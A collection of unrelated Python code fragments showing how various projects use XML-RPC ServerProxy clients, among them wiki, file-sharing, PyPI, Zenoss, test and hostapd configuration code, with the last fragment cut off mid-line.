def __init__(self, config, notebook): self.name = 'DokuWiki' self.notebook = notebook # Configuration self.url, username, pwd = config.get(self.name, self.notebook).split(';') ServerProxy.__init__(self, self.url + '/lib/exe/xmlrpc.php?' + urlencode({'u':username, 'p':pwd}))
def getMonitorsConfig(self): """ Get monitors configuration from hosts """ if not self.monitor_hosts: return monitor_hosts = [] for (name, host, port, desc) in self.monitor_hosts: trace("* Getting monitoring config from %s: ..." % name) server = ServerProxy("http://%s:%s" % (host, port)) try: config = server.getMonitorsConfig() data = [] for key in config.keys(): xml = '<monitorconfig host="%s" key="%s" value="%s" />' % ( name, key, config[key]) data.append(xml) self.logr("\n".join(data)) except Fault: trace(' not supported.\n') monitor_hosts.append((name, host, port, desc)) except SocketError: trace(' failed, server is down.\n') else: trace(' done.\n') monitor_hosts.append((name, host, port, desc)) self.monitor_hosts = monitor_hosts
def connect(url): if url == "auto": # Not an URL, but a configuration option servers = file(CONFIG_FILENAME, "r").readlines() # Randomize the list for load balancing random.shuffle(servers) for server in servers: if server == "" or server.startswith("#"): continue s = connect(server) if s is not None: return s doLog("No server is available!") sys.exit(1) else: url = url.strip("\r").strip("\n") s = ServerProxy(url, allow_none=True) try: status = s.ping() doLog("Checking server %s status: %s" %(url, status)) if status != "[ALIVE]": return None except: doLog("Error:" + str(sys.exc_info()[1])) return None return s
class Client(wx.App): """ 主Client类,用于设定GUI,启动为文件服务的Node。 """ def __inif__(self, url, dirname, urlfile): """ 创建一个随机的密码,使用这个密码实例化Node。利用Node的_start方法(确保Thread是个无交互的后台程序, 这样他会随着程序退出而退出)启动Thread,读取URL文件中的所有URL,并且将Node介绍给这些URL。 """ super(Client, self).__init__() self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() #让服务器先启动。 sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): line = line.strip() self.server.hello(line) def OnInit(self): """ 设置GUI。创建窗体、文本框和按钮,并且进行布局。将提交按钮绑定到self.fetchHandler上。 """ win = wx.Frame(None, title="File Sharing Client", size=(400,45)) bkg = wx.Panel(win) self.input = input = wx.TextCtrl(bkg) submit = wx.Button(bkg, label="Fetch", size=(80, 25)) submit.Bind(wx.EVT_BUTTON, self.fetchHandler) hbox = wx.BoxSizer() hbox.Add(input, proportion=1, flag=wx.ALL|wx.EXPAND, border=10) hbox.Add(submit, flag=wx.TOP|wx.BOTTON|wx.RIGHT, border=10) vbox = wx.BoxSizer(wx.VERTICAL) vbox.Add(hbox, proportion=0, flag=wx.EXPAND) bkg.SetSizer(vbox) win.Show() return True def fetchHandler(self, event): """ 在用户点击‘Fetch’按钮时调用,读取文本框中的查询,调用服务器Node的fetch方法。 如果查询没有被处理则打印错误信息。 """ query = self.input.getValue() try: self.server.fetch(query, self.secret) except Fault, f: if f.faultCode != UNHANDLED: raise print "Couldn't find the file", query
class Client(Cmd): ''' A text-based client interface. ''' prompt = '>' def __init__(self, url, dirname, urlfile): ''' Initialize the node and start the Node server in a seperate thread. ''' Cmd.__init__(self) self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): self.server.hello(line.strip()) def do_fetch(self, arg): ''' Fetch the specified file. ''' try: self.server.fetch(arg, self.secret) except Fault, f: if f.faultCode !=UNHANDLED: raise print 'Could not find ', arg
def llRemoteData(Channel, Int, String): client = ServerProxy(gateway) try: return client.llRemoteData({"Channel" : Channel, "IntValue" : Int, "StringValue" : String}) except Error as v: # print "Error: %s %s" % (v, channel) return False
def execute(args, parser): global binstar_upload global client binstar_upload = args.binstar_upload client = ServerProxy(args.pypi_url) package = args.pypi_name[0] if args.release == 'latest': version = None all_versions = False else: all_versions = True version = args.release[0] releases = client.package_releases(package, all_versions) if not releases: sys.exit("Error: PyPI does not have a package named %s" % package) if all_versions and version not in releases: print(releases) print("Warning: PyPI does not have version %s of package %s" % (version, package)) if all_versions: build_package(package, version) else: version = releases[0] build_package(package, version)
def setUp(self): yield base.TestBase.setUp(self, "peer0.conf") peering.load_keys() # Start peer servers cwd = os.path.join(os.getcwd(), "..") log.msg("Cleaning peer servers...") peer1=subprocess.Popen("PYTHONPATH=. scripts/denyhosts-server -c tests/peer1.conf --recreate-database --force > /dev/null 2>&1", cwd=cwd, shell=True) peer2=subprocess.Popen("PYTHONPATH=. scripts/denyhosts-server -c tests/peer2.conf --recreate-database --force > /dev/null 2>&1", cwd=cwd, shell=True) peer1.wait() peer2.wait() log.msg("Starting peer servers...") self.peer1=subprocess.Popen("PYTHONPATH=. scripts/denyhosts-server -c tests/peer1.conf >/dev/null 2>&1", cwd=cwd, shell=True, preexec_fn=os.setsid) self.peer2=subprocess.Popen("PYTHONPATH=. scripts/denyhosts-server -c tests/peer2.conf >/dev/null 2>&1", cwd=cwd, shell=True, preexec_fn=os.setsid) log.msg("Waiting until peer servers are responsive...") for peer_url in config.peers: server = ServerProxy(peer_url) is_up = False start_time = time.time() while not is_up and time.time() - start_time < 10: try: server.get_new_hosts(time.time(), 1, [], 3600) is_up = True log.msg("Peer {} is up!".format(peer_url)) except: time.sleep(0.2) if not is_up: self.fail("Failed to start peer {}".format(peer_url))
def test_listen_port(self): """ The test case to test the server created by NodeSamplerServer class. :return: """ def start_server(): self.node_sampler_server.start() server_thread = Thread(target=start_server) server_thread.setDaemon(True) server_thread.start() proxy = ServerProxy("http://localhost:8000") service_a = Service(name="$$service_a$$", check_methods=TEST_METHOD, ip=TEST_IP) service_b = Service(name="$$service_b$$", check_methods=TEST_METHOD, ip=TEST_IP) service_c = Service(name="$$service_c$$", check_methods=TEST_METHOD, ip=TEST_IP) fake_services = [service_a, service_b, service_c] self.assertEquals( proxy.sample(fake_services), 1, "NodeSamplerServer cannot create object.")
class Client(Cmd): """ Node类的简单的基于文本的界面。 """ prompt = '>' def __init__(self, url, dirname, urlfile): """ 设定url、dirname和urlfile,并且在单独的线程中启动Node服务器。 """ Cmd.__init__(self) self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target = n._start) t.setDaemon(1) t.start() #让服务器先启动。 sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): line = line.strip() self.server.hello(line) def do_fetch(self, arg): "调用服务器的fetch方法" try: self.server.fetch(arg, self.secret) except Fault, f: if f.faultCode != UNHANDLED: raise print "Counldn't find the file", arg
class RPC(object): _instance = None def __new__(cls, host): if not cls._instance: cls._instance = object.__new__(cls, host) return cls._instance def __init__(self, host): self.host = host host = "localhost" self.server = ServerProxy("http://%s:%u" % (host, RPC_PORT)) def _close(self): print "stop" self.server.stop() del self.server @classmethod def close(cls): print "close", cls._instance if not cls._instance: return cls._instance._close() cls._instance = None
def sync(self, tracker): server = ServerProxy(tracker.config, allow_none=True, use_datetime=datetime) last_update = DateTime(time.mktime(tracker.last_update.timetuple())) users = self._get_users(server) ids = map(int, server.filter('issue', None, {'activity': str(last_update)})) for issue_id in ids: data = server.display('issue%d' % issue_id, 'title', 'creation', 'creator', 'assignedto', 'activity', 'messages', 'status') issue = Issue.by_tracker_id(tracker.id, issue_id) issue.no = issue_id issue.set_title(data.get('title', '')) issue.set_description(self._get_description( server, data.get('messages', []))) issue.reporter = users[int(data['creator'])] issue.owner = users[int(data['assignedto'])] issue.last_change = _roundup_date_to_datetime(data.get('activity')) status = int(data.get('status', -1)) issue.active = status in ACTIVE_STATUS issue.tracker = tracker if not issue.id: issue.created = datetime.now() issue.updated = datetime.now() issue.save() post_issue_sync.send(sender=self, issue=issue) self._update_user_data(server, data, issue, users) tracker.last_update = datetime.now() - timedelta(days=1) tracker.save() post_tracker_sync.send(sender=self, tracker=tracker) return True
def execute(args, parser): global binstar_upload global client binstar_upload = args.binstar_upload client = ServerProxy(args.pypi_url) package = args.pypi_name[0] if args.release == 'latest': version = None all_versions = False else: all_versions = True version = args.release[0] search = client.search({'name': package}) if search: r_name = list(filter(lambda x: ('name' in x and package.lower() == x['name'].lower()), search)) if r_name: print('Package search: %s' % r_name[0]) package = r_name[0]['name'] releases = client.package_releases(package, all_versions) if not releases: sys.exit("Error: PyPI does not have a package named %s" % package) if all_versions and version not in releases: print(releases) print("Warning: PyPI does not have version %s of package %s" % (version, package)) if all_versions: build_package(package, version) else: version = releases[0] build_package(package, version)
def editDevice(info): Zenoss = {'deviceName': '', 'devicePath': '', 'tag': '', 'serialNumber': '', 'zSnmpCommunity': 'monitor', 'zSnmpPort': '161', 'zSnmpVer': 'v1', 'rackSlot': '0', 'productionState': '1000', 'comments': '', 'hwManufacturer': '', 'hwProductName': '', 'osManufacturer': '', 'osProductName': '', 'locationPath': '', 'groupPaths': '', 'systemPaths': '', 'statusMonitors': '', 'performanceMonitor': '', 'discoverProto': 'snmp', 'priority': '3'} x = 0 for a in info: Zenoss['deviceName'] = info[x][0] url = http(Zenoss['deviceName']) valid = re.search("http", url) if valid: snmp_out = http(url+snmpurl) Zenoss['zSnmpCommunity'] = snmp_out[0] Zenoss['zSnmpVer'] = snmp_out[1] Zenoss['comments'] = "Switch %s\n Hardware %s\n Console %s\n Power %s\n Build Profile %s" % (info[x][2],info[x][3],info[x][4],info[x][5],info[x][6]) sys_match = re.search("\w+", "info[x][8]") if sys_match: Zenoss['systemPaths'] = "/%s" % (info[x][8]) groups_return = http(groupsUrl) Zenoss['groupPaths'] = group_final(groups_return, Zenoss['systemPaths']) serv = ServerProxy (url,allow_none=1) serv.manage_editDevice(Zenoss['tag'], Zenoss['serialNumber'], Zenoss['zSnmpCommunity'], Zenoss['zSnmpPort'], Zenoss['zSnmpVer'], Zenoss['rackSlot'], Zenoss['productionState'], Zenoss['comments'], Zenoss['hwManufacturer'], Zenoss['hwProductName'], Zenoss['osManufacturer'], Zenoss['osProductName'], Zenoss['locationPath'] , Zenoss['groupPaths'], Zenoss['systemPaths']) if verbose: print "%s\n%s\n%s\n%s\n%s\n%s\n" % (url,Zenoss['zSnmpCommunity'],Zenoss['zSnmpVer'],Zenoss['comments'], Zenoss['systemPaths'],Zenoss['groupPaths']) x = x +1
class TriggerServer(): def __init__(self, ip, port, robot_name): self._server = Server((ip, port), allow_none=True) self._server.register_function(self.get, 'get') self._server.register_function(lambda: 'OK', 'ping') self._sp = ServerProxy("http://%s:%d"%(ip,port)) self._ros_publisher = rospy.Publisher('/%s/trigger'%robot_name, String, queue_size=10) self._stop = False # RPC METHOD def get(self, data): self._ros_publisher.publish(String(data=data)) def serve(self): thread.start_new_thread(self._serve, ()) rospy.spin() self._stop = True self._sp.ping() def _serve(self): while not self._stop: self._server.handle_request() rospy.loginfo("Shutting down TriggerServer")
def callable(timezone): try: server = ServerProxy(settings.NIMBUS_MANAGER_URL) server.generate_ntpdate_file_on_cron(timezone.ntp_server) except Exception, error: logger = logging.getLogger(__name__) logger.exception("Conexao com nimbus-manager falhou")
class Client(Cmd): """ A simple text-based interface to the Node class. """ prompt = '> ' def __init__(self, url, dirname, urlfile): """ Sets the url, dirname, and urlfile, and starts the Node Server in a separate thread. """ Cmd.__init__(self) self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() # Give the server a head start: sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): line = line.strip() self.server.hello(line) def do_fetch(self, arg): "Call the fetch method of the Server." try: self.server.fetch(arg, self.secret) except Fault, f: if f.faultCode != UNHANDLED: raise print "Couldn't find the file", arg
def item(request): s = ServerProxy('http://www.upcdatabase.com/xmlrpc') # Gets the ean-code value ean = request.GET.get('ean', '') print ean # Nothing Scanned if (ean == ''): return render_to_response("fms/home.html",script_args) elif (len(ean) == 13 and ean[0]=='0'): # Scanned From Pic-2-Shop App From Mobile Device (Trims leading 0) ean = ean[1:] # elif """query for upc locally""" # Happens when there is a local entry already stored # Redirects to the items page params = { 'rpc_key': rpc_key, 'upc': ean } item_lookup_data = s.lookup(params) print item_lookup_data i_l_d = [] for key, value in item_lookup_data.iteritems(): i_l_d.append((key,value)) script_args['item_lookup_data']= i_l_d return render_to_response("fms/item.html", script_args) return render_to_response("fms/item.html", script_args)
class TestDaemon(TestCase): def setUp(self): illuminant_port = random.randrange(10000, 30000) daemon_port = random.randrange(10000, 30000) self.illuminant_obj = run_illuminant(illuminant_port) self.daemon_obj = run_daemon(daemon_port, port_to_uri(illuminant_port)) self.d = ServerProxy(port_to_uri(daemon_port)) self.i = ServerProxy(port_to_uri(illuminant_port)) while self.illuminant_obj.handler is None: time.sleep(0.01) self.illuminant_handler = self.illuminant_obj.handler while self.daemon_obj.handler is None: time.sleep(0.01) self.daemon_handler = self.illuminant_obj.handler def test_Daemon(self): res = self.d.registerService(CALLER_ID, SERVICE, port_to_uri(0), CALLER_API) self.assertEqual(res[0], 1) records = self.illuminant_handler.records self.assertEqual(len(records[SERVICE]), 1) res = self.d.unregisterService(CALLER_ID, SERVICE, port_to_uri(0)) self.assertEqual(res[0], 1) def test_LRU(self, times=10): for i in range(times): self.d.registerService(CALLER_ID, SERVICE, port_to_uri(i), CALLER_API) ports = [] for i in range(times): res = self.d.lookupService(CALLER_ID, SERVICE) ports.append(uri_to_port(res[2])) ports.sort() self.assertEqual(ports, list(range(times)))
def _broadcast(self,query,starturl,history): """ broadcast to all other nodes """ mylogger.info('-'*10) mylogger.info('[broadcast]:') mylogger.info("knows: {0}".format(self.known)) mylogger.info("history: {0}".format(history)) for other in self.known.copy(): mylogger.info('[broadcast]: other is {0}'.format(other)) if other in history: continue s = ServerProxy(other) mylogger.info('[broadcast]: Connecting from {0} to {1}'.format(self.url,other)) mylogger.info('*'*80) try: code,data = s.query(query,starturl,history) mylogger.info('[broadcast]: query return code {0}'.format(code)) if code == SUCCESS: mylogger.info('[broadcast]: query SUCCESS!!!') return code,data elif code == NOT_EXIST: mylogger.info('[broadcast]: query NOT_EXIST!!!') else: mylogger.info('[broadcast]: query ACCESS_DENIED!!!') except Fault, f: # connected to server,but method does not exist(Never happen in this example) mylogger.warn(f) mylogger.warn("[broadcast]:except fault") except socket.error, e: mylogger.warn("[broadcast]:except socket error") mylogger.error('[broadcast]: {0} for {1}'.format(e,other)) # added by kzl self.known.remove(other)
def login(request): """ This method lets a user login to pyquiz """ if unauthenticated_userid(request) != None and 'user' in request.session.keys(): return HTTPFound(location='/index') message = '' login = '' password = '' if 'form.submitted' in request.params: username = request.params['login'] password = request.params['password'] server = ServerProxy(serverLocation, transport = trans) if server.login(username, password): user_info = server.get_user_info(username) userinfo = schooltool_login(username, password, user_info) request.session['user'] = userinfo headers = remember(request, userinfo['roles'][0]) return HTTPFound(location='/index', headers = headers) message = 'Failed login' return dict( message = message, url = request.application_url + '/', login = login, password = password, main = get_renderer('templates/master.pt').implementation(), )
def editDevice(cluster, host): Zenoss = {'deviceName': '', 'devicePath': '', 'tag': '', 'serialNumber': '', 'zSnmpCommunity': 'cci-ro', 'zSnmpPort': '161', 'zSnmpVer': 'v2c', 'rackSlot': '0', 'productionState': '1000', 'comments': '', 'hwManufacturer': '', 'hwProductName': '', 'osManufacturer': '', 'osProductName': '', 'locationPath': '', 'groupPaths': '', 'systemPaths': '', 'statusMonitors': '', 'performanceMonitor': '', 'discoverProto': 'snmp', 'priority': '3'} Zenoss['deviceName'] = host Zenoss['systemPaths'] = cluster url = http(Zenoss['deviceName']) valid = re.search("http", url) if valid: snmp_out = http(url+snmpurl) Zenoss['zSnmpCommunity'] = snmp_out[0] Zenoss['zSnmpVer'] = snmp_out[1] sys_match = re.search("\w+", "cluster") if sys_match: Zenoss['systemPaths'] = "/%s" % (cluster) # groups_return = http(groupsUrl) # Zenoss['groupPaths'] = group_final(groups_return, Zenoss['systemPaths']) serv = ServerProxy (url,allow_none=1) serv.manage_editDevice(Zenoss['tag'], Zenoss['serialNumber'], Zenoss['zSnmpCommunity'], Zenoss['zSnmpPort'], Zenoss['zSnmpVer'], Zenoss['rackSlot'], Zenoss['productionState'], Zenoss['comments'], Zenoss['hwManufacturer'], Zenoss['hwProductName'], Zenoss['osManufacturer'], Zenoss['osProductName'], Zenoss['locationPath'] , Zenoss['groupPaths'], Zenoss['systemPaths']) if verbose: print "%s\n%s\n%s\n%s\n%s\n%s\n" % (url,Zenoss['zSnmpCommunity'],Zenoss['zSnmpVer'],Zenoss['comments'], Zenoss['systemPaths'],Zenoss['groupPaths'])
def __init__(self, context): preference_tool = getToolByName(context, 'portal_preferences') uri = getattr(preference_tool, "getPreferredDocumentConversionServerUrl", str)() if uri in ('', None): address = preference_tool.getPreferredOoodocServerAddress() port = preference_tool.getPreferredOoodocServerPortNumber() if address in ('', None) or port in ('', None) : raise ConversionError('OOoDocument: cannot proceed with conversion:' ' conversion server url is not defined in preferences') LOG('OOoDocument', WARNING, 'PreferredOoodocServer{Address,PortNumber}' + \ ' are DEPRECATED please use PreferredDocumentServerUrl instead', error=True) scheme = "http" uri = 'http://%s:%d' % (address, port) else: if uri.startswith("http://"): scheme = "http" elif uri.startswith("https://"): scheme = "https" else: raise ConversionError('OOoDocument: cannot proceed with conversion:' ' preferred conversion server url is invalid') timeout = preference_tool.getPreferredOoodocServerTimeout() \ or OOO_SERVER_PROXY_TIMEOUT transport = TimeoutTransport(timeout=timeout, scheme=scheme) ServerProxy.__init__(self, uri, allow_none=True, transport=transport)
class Client(Cmd): prompt = '>' def __init__(self, url, dirname, urlfile): Cmd.__init__(self) self.secret = randomString(SECRET_LENGTH) n = Node(url, dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() sleep(HEAD_START) self.server = ServerProxy(url) for line in open(urlfile): line = line.strip() self.server.hello(line) def do_fetch(self, arg): try: self.server.fetch(arg, self.secret) except Fault as f: if f.faultCode != UNHANDLED: raise print "Couldn't find the file", arg, f def do_exit(self, arg): print sys.exit() do_EOF = do_exit
class Hella(FooApp): name = 'hella' config_opts = { 'password': '******', 'server': 'The IP address or hostname running hellanzb', 'port': 'The port hellanzb is running on. The default is 8760', } def __init__(self, server=None): FooApp.__init__(self, server) self.hellaserver = ServerProxy('http://*****:*****@%s:%s/' % (self.data['password'], self.data['server'], self.data['port'])) self.data = FileStore('/tmp/apps/hella') try: self.cache = json.loads(self.data['cache']) except: self.cache = [] def send(self, msg): response = self.hellaserver.enqueuenewzbin(int(msg['text'])) return def run(self): while True: status = self.hellaserver.status() for entry in status['log_entries']: for key, value in entry.items(): if not value in self.cache: self.recv('%s: %s' % (self.name, value)) self.cache.append(value) self.data['cache'] = json.dumps(self.cache) sleep(10)
class attk_server(object): def __init__(self, password, url): self.id = None self.password = password self.url = url self.xml = ServerProxy(self._make_url()) def _make_url(self): url = list(urlsplit(self.url)) url[1] = 'x:' + self.password + '@' + url[1] url[2] = url[2] + 'RPC2' return urlunsplit(url) def ping(self): debug('client pinging server') return self.xml.ping() == 'pong' def finish_attack(self, attack_id, status): debug('client finishing attack with server') self.xml.finishAttack(attack_id, config.client_id, status) def register(self): debug('client registering with server') retval = self.xml.registerClient( self.password, config.client_id, config.url, config.password, ) if retval is not False: self.id = retval
class Graph( object ): ADDRESS = "http://127.0.0.1:8000/" """The default pyWebGraph XML-RPC server address: `http://127.0.0.1:8000/`""" def __init__( self, address = None ): if not address: address = Graph.ADDRESS self.__proxy = ServerProxy( address ) self.__wrapped = [ 'current_node', 'num_nodes', 'node_tos' ] def __getattr__( self, name ): if name in self.__wrapped: return getattr( self, name ) else: return getattr( self.__proxy, name ) def get_num_nodes( self ): return self.__proxy.get_num_nodes() num_nodes = property( get_num_nodes ) def get_current_node( self ): return self.__proxy.get_current_node() def set_current_node( self, node ): return self.__proxy.set_current_node( node ) current_node = property( get_current_node, set_current_node ) def node_tos( self, node ): return self.__proxy.node_tos( node ).encode( 'utf8' )
def requestTopic(self, topic): code, statusMessage, publishers = self.master.registerSubscriber( self.callerId, topic, lookupTopicType(topic)[0], self.callerApi ) assert code == 1, (code, statusMessage) assert len(publishers) == 1, (topic, publishers) # i.e. fails if publisher is not ready now print publishers publisher = ServerProxy(publishers[0]) code, statusMessage, protocolParams = publisher.requestTopic(self.callerId, topic, [["TCPROS"]]) assert code == 1, (code, statusMessage) assert len(protocolParams) == 3, protocolParams print code, statusMessage, protocolParams hostPortPair = (protocolParams[1], protocolParams[2]) soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP soc.connect(hostPortPair) soc.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) soc.setblocking(0) soc.settimeout(SOCKET_TIMEOUT) header = prefix4BytesLen( prefix4BytesLen("callerid=" + self.callerId) + prefix4BytesLen("topic=" + topic) + prefix4BytesLen("type=" + lookupTopicType(topic)[0]) + prefix4BytesLen("md5sum=" + lookupTopicType(topic)[1]) + "" ) soc.send(header) return soc
def on_task_output(self, task, config): from xmlrpclib import ServerProxy params = dict(config) server = ServerProxy(params["url"]) for entry in task.accepted: if task.options.test: log.info('Would add into nzbget: %s' % entry['title']) continue # allow overriding the category if 'category' in entry: params['category'] = entry['category'] try: server.appendurl(entry["title"] + '.nzb', params["category"], params["priority"], params["top"], entry["url"]) log.info("Added `%s` to nzbget" % entry["title"]) except: log.critical("rpc call to nzbget failed") entry.fail("could not call appendurl via RPC")
def main(): addr_params = XMLRPC_ADDR + (PROJECT_TOKEN, ) bot = ServerProxy('http://%s:%i/%s/xmlrpc' % addr_params) repo = os.path.basename(os.getcwd()) if repo.endswith('.git'): repo = repo[:-len('.git')] messages = [] for line in sys.stdin: (old, new, refname) = line.split() if refname.startswith('refs/heads/'): refname = refname[len('refs/heads/'):] if new.strip('0'): if old.strip('0'): revisions = get_output('git', 'rev-list', '%s..%s' % (old, new)).splitlines() for revision in reversed(revisions): msg = format_commit_message(repo, refname, revision) messages.append(msg) else: messages.append('New branch: %s/%s' % (repo, refname)) messages.append( format_commit_message(repo, refname, new)) else: messages.append( 'Branch %s/%s deleted (was: %s)' % (repo, refname, old)) if messages: bot.notify("\n".join(messages))
import os import stat import sys import kaa.webmetadata import kaa.webmetadata.tv import kaa.beacon from xmlrpclib import ServerProxy, Error server = ServerProxy("http://api.opensubtitles.org/xml-rpc") session = server.LogIn("", "", "en", "OS Test User Agent") token = session["token"] @kaa.coroutine() def main(): kaa.webmetadata.init() print 'check for missing tvdb mapping' print '------------------------------' missing = [] # for alias in (yield kaa.beacon.query(type='video', attr='series')): # if kaa.webmetadata.tv.series(alias): # continue # print 'Missing mapping for "%s"' % alias # print 'Files:' # # imdb = None # for item in (yield kaa.beacon.query(type='video', series=alias)): # print ' ', item.filename # result = yield kaa.webmetadata.tv.search(item.filename, item) # if len(result) == 1:
class Hostapd(ConfFile): """Class hostapd """ # Attributes: __options = {'a':"auth_algs=", 'b':"beacon_int=", 'c':"channel=", 'd':"driver=", 'h':"hw_mode=", 'i':"interface=", 'k':"wpa_key_mgmt=", 'm':"ieee80211", 'n':"country_code=", 's':"ssid=", 't':"basic_rates=", 'u':"supported_rates=", 'w':"wpa_passphrase=", 'y':"wpa_pairwise=", 'z':"rsn_pairwise=", 'wpa':"wpa=", 'wep_def':"wep_default_key=", 'key':'wep_key', 'x':'ieee8021x=', 'asa':'auth_server_addr=', 'asp':'auth_server_port=', 'ass':'auth_server_shared_secret=', 'msg':'eap_message=', } # Operations def __init__(self, name, server_ip, server_port='80'): """Generates a configuration file. `name` specifies the name of the configuration file. Example: ---- | **Settings** | *Arguments* | | | Library | configuration_file_name | server_ip | ---- """ ConfFile.__init__(self, name) self.proxy = ServerProxy("http://" + server_ip + ":" + server_port, allow_none=False) def auth_algs(self, auth): """Used to specify authentication algorithm Example: ---- | auth algs | 1 | #Open | | auth algs | 2 | #Shared | | auth algs | 3 | #Both | ---- """ self.stream_edit(self.__options['a'] + '.*', self.__options['a'] + auth) def beacon_interval(self, b_int): """Used to set the beacon interval of AP Example: ---- | beacon_interval | 100 | ---- """ self.stream_edit(self.__options['b'] + '.*', self.__options['b'] + b_int) def channel(self, chan): """Used to specify the operating channel of AP Example: ---- | channel | 1 | #center freq 2412MHz | ---- """ self.stream_edit(self.__options['c'] + '.*', self.__options['c'] + str(chan)) def driver(self, driv): """To sepcify driver ---- Example: | driver | nl80211 | ---- """ self.stream_edit(self.__options['d'] + '.*', self.__options['d'] + driv) def interface(self, iface='wlan0'): """Used to select the wireless interface By default the interface will be `wlan0` ---- Example: | interface | wlan0 | ---- """ self.stream_edit(self.__options['i'] + '.*', self.__options['i'] + iface) def mode(self, std): """"Used to select operating mode Example: ---- | mode | a | #IEEE802.11a std | mode | b | #IEEE802.11b std | mode | g | #IEEE802.11g std | mode | n | #IEEE802.11n (2.4GHz) std | mode | n2.4GHz | #IEEE802.11n (2.4GHz) std | mode | n5G | #IEEE802.11n (5GHz) std | mode | ac | #IEEE802.11ac std ---- """ n2g = ['n', 'n2.4', 'n2.4G', 'n2.4GHz'] n5g = ['n5', 'n5G', 'n5GHz'] if std == 'a' or std == 'b' or std == 'g': self.stream_edit(self.__options['h'] + '.*', self.__options['h'] + std) if std in n2g: self.stream_edit(self.__options['h'] + '.*', self.__options['h'] + 'g') self.stream_edit(self.__options['m'] + '.*', self.__options['m'] + 'n=1') if std in n5g: self.stream_edit(self.__options['h'] + '.*', self.__options['h'] + 'a') self.stream_edit(self.__options['m'] + '.*', self.__options['m'] + 'n=1') if std == 'ac': self.stream_edit(self.__options['h'] + '.*', self.__options['h'] + 'a') self.stream_edit(self.__options['m'] + '.*', self.__options['m'] + 'ac=1') self.delete(self.__options['t'] + '.*') self.delete(self.__options['u'] + '.*') def country_code(self, nation='IN'): """Used to set country of operation of AP By default the coutry of operation is India (IN). Example: ---- | country code | IN | #Operating country is now India | """ self.stream_edit(self.__options['n'] + '.*', self.__options['n'] + nation) def ap_ssid(self, nw_name): """Used to provide ssid for the AP. Example: ---- | ap ssid | myAP | ---- """ self.stream_edit(self.__options['s'] + '.*', self.__options['s'] + nw_name) def wpa_key_mgmt(self, wpa_key='WPA2-PSK'): """Used to select the WPA security By default, the security will be WPA2-PSK Values to the keyword are case sensitive Example: ---- | wpa key mgmt | WPA-PSK | #Security is now WPA-PSK | | wpa key mgmt | NONE | #Security is None | | wpa key mgmt | WPA2-PSK | #Security is WPA2-PSK | | wpa key mgmt | WPA/WPA2-PSK | #Security is WPA/WPA2-PSK | When WPA/WPA2-PSK is used, select appropriate pairwise mechanisms. ---- """ if wpa_key == 'NONE': self.delete(self.__options['k'] + '.*') self.delete(self.__options['w'] + '.*') self.delete(self.__options['y'] + '.*') self.delete(self.__options['z'] + '.*') self.delete(self.__options['wpa'] + '.*') self.delete(self.__options['x'] + '.*') self.delete(self.__options['asa'] + '.*') self.delete(self.__options['asp'] + '.*') self.delete(self.__options['ass'] + '.*') self.delete(self.__options['msg'] + '.*') if wpa_key == 'WPA-PSK': self.stream_edit(self.__options['wpa'] + '.*', self.__options['wpa'] + '1') self.stream_edit(self.__options['k'] + '.*', self.__options['k'] + 'WPA-PSK') self.delete(self.__options['x'] + '.*') self.delete(self.__options['asa'] + '.*') self.delete(self.__options['asp'] + '.*') self.delete(self.__options['ass'] + '.*') self.delete(self.__options['msg'] + '.*') if wpa_key == 'WPA2-PSK': self.stream_edit(self.__options['wpa'] + '.*', self.__options['wpa'] + '2') self.stream_edit(self.__options['k'] + '.*', self.__options['k'] + 'WPA-PSK') self.delete(self.__options['x'] + '.*') self.delete(self.__options['asa'] + '.*') self.delete(self.__options['asp'] + '.*') self.delete(self.__options['ass'] + '.*') self.delete(self.__options['msg'] + '.*') if wpa_key == 'WPA/WPA2-PSK': self.stream_edit(self.__options['wpa'] + '.*', self.__options['wpa'] + '3') self.stream_edit(self.__options['k'] + '.*', self.__options['k'] + 'WPA-PSK') self.delete(self.__options['x'] + '.*') self.delete(self.__options['asa'] + '.*') self.delete(self.__options['asp'] + '.*') self.delete(self.__options['ass'] + '.*') self.delete(self.__options['msg'] + '.*') if wpa_key == 'WPA-Radius': self.stream_edit(self.__options['x'] + '.*', self.__options['x'] + '1') self.stream_edit(self.__options['wpa'] + '.*', self.__options['wpa'] + '1') self.stream_edit(self.__options['k'] + '.*', self.__options['k'] + 'WPA-EAP') if wpa_key == 'WPA2-Radius': self.stream_edit(self.__options['x'] + '.*', self.__options['x'] + '1') self.stream_edit(self.__options['wpa'] + '.*', self.__options['wpa'] + '2') self.stream_edit(self.__options['k'] + '.*', self.__options['k'] + 'WPA-EAP') if wpa_key == 'WPA/WPA2-Radius': self.stream_edit(self.__options['x'] + '.*', self.__options['x'] + '1') self.stream_edit(self.__options['wpa'] + '.*', self.__options['wpa'] + '3') self.stream_edit(self.__options['k'] + '.*', self.__options['k'] + 'WPA-EAP') self.delete(self.__options['wep_def'] + '.*') self.delete(self.__options['key'] + '.*') def auth_server(ip, port): '''Used to Set Radius Server address and port Example: ---- | auth server | 192.168.43.3 | 1812 | ''' self.stream_edit(self.__options['asa'] + '.*', self.__options['asa'] + str(ip)) self.stream_edit(self.__options['asp'] + '.*', self.__options['asp'] + str(port)) def auth_server_secret(shared_secret): '''Used to Set Radius Server password Example: ---- | auth server secret | sharedsecret | ''' self.stream_edit(self.__options['ass'] + '.*', self.__options['ass'] + str(shared_secret)) def eap_msg(msg): '''Used to customize Radius server's message Example: ---- | eap msg | my_server_says_hi | ''' self.stream_edit(self.__options['msg'] + '.*', self.__options['msg'] + msg) def wpa_passphrase(self, wpa_pass): """Used to set the password when any one of WPA mechanism is used. Example: ---- | wpa passphrase | password | --- """ self.stream_edit(self.__options['w'] + '.*', self.__options['w'] + wpa_pass) def basic_rates(self, *br): """"Used to set basic rates for AP Values to the keyword can be a list Example: ---- | basic rates | 10 | 20 | 55 | 110 | ---- """ self.stream_edit(self.__options['t'] + '.*', 